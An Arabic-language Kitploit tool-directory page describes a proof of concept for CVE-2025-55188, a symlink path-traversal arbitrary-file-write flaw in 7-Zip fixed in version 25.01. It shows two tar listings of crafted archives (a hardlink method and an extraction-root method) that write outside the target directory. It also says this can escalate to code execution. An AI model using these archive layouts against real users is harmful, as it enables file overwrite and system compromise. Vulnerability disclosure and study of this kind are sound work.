Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55188 — إثبات المفهوم لـ CVE-2025-55188: كتابة ملفات عشوائية في 7-Zip | Kitploit
أدوات/GitHubGitHub/lunbun/cve-2025-55188
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولاتاستغلال الملفات الثنائية
GitHublunbun/cve-2025-55188

CVE-2025-55188

إثبات المفهوم لـ CVE-2025-55188: كتابة ملفات عشوائية في 7-Zip

عرض المستودع
81منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2025-55188: كتابة ملفات تعسفية في 7-Zip

إثبات مفهوم لـ CVE-2025-55188، وهي ثغرة كتابة تعسفية للملفات في 7-Zip. تم تصحيحها في الإصدار 25.01، الذي صدر في 3 أغسطس 2025.

ملاحظة: CVE-2025-55188 مختلفة عن CVE-2025-11001.

الإصدار الذي تم فيه تصحيح CVE-2025-11001 (الإصدار 25.00) لا يزال عرضة لتنفيذ كود تعسفي عبر هجمات الروابط الرمزية بسبب CVE-2025-55188.

تم اكتشاف CVE-2025-55188 ونشره قبل نشر CVE-2025-11001.

انظر https://lunbun.dev/blog/cve-2025-55188/ للحصول على شرح وتفاصيل أكثر.

الثغرة بسيطة إلى حدٍ ما.

يتم تنفيذ اجتياز المسار عبر الروابط الرمزية لكتابة الملفات بشكل تعسفي. ومن هناك، يمكن تصعيد الكتابة التعسفية للملفات إلى تنفيذ كود تعسفي عبر الكتابة إلى ملفات حرجة.

اجتياز المسار عبر الروابط الرمزية ممكن بسبب حالة حافة في فحوصات أمان الروابط الرمزية. لقد وجدت طريقتين للقيام بذلك. راجع منشور المدونة لمزيد من التفاصيل.

طريقة اجتياز المسار 1: إساءة استخدام الروابط الصلبة

ملف .tar التالي سيكتب إلى ../a/b/file.txt عند الاستخراج:

root@kitploit:~
$ tar -tvf write.tar
lrw-r--r-- 0/0               0 1969-12-31 16:00 a/link -> ../a/b
hrwxr-xr-x 0/0               0 1969-12-31 16:00 link link to a/link
-rw-r--r-- 0/0              44 1969-12-31 16:00 link/file.txt

يحتوي poc_hardlink على الكود الذي يستخدم طريقة الروابط الصلبة.

طريقة اجتياز المسار 2: إساءة استخدام ميزة جذر الاستخراج

ملف .tar التالي سيكتب إلى ../file.txt عند الاستخراج (فقط على لينكس):

root@kitploit:~
$ tar -tvf write.tar
lrw-r--r-- 0/0               0 1969-12-31 16:00 a/b/link -> /a
lrw-r--r-- 0/0               0 1969-12-31 16:00 link -> a/b/link/../../
-rw-r--r-- 0/0              44 1969-12-31 16:00 link/file.txt

يحتوي poc_extraction_root على الكود الذي يستخدم طريقة جذر الاستخراج.

تنزيل الأداة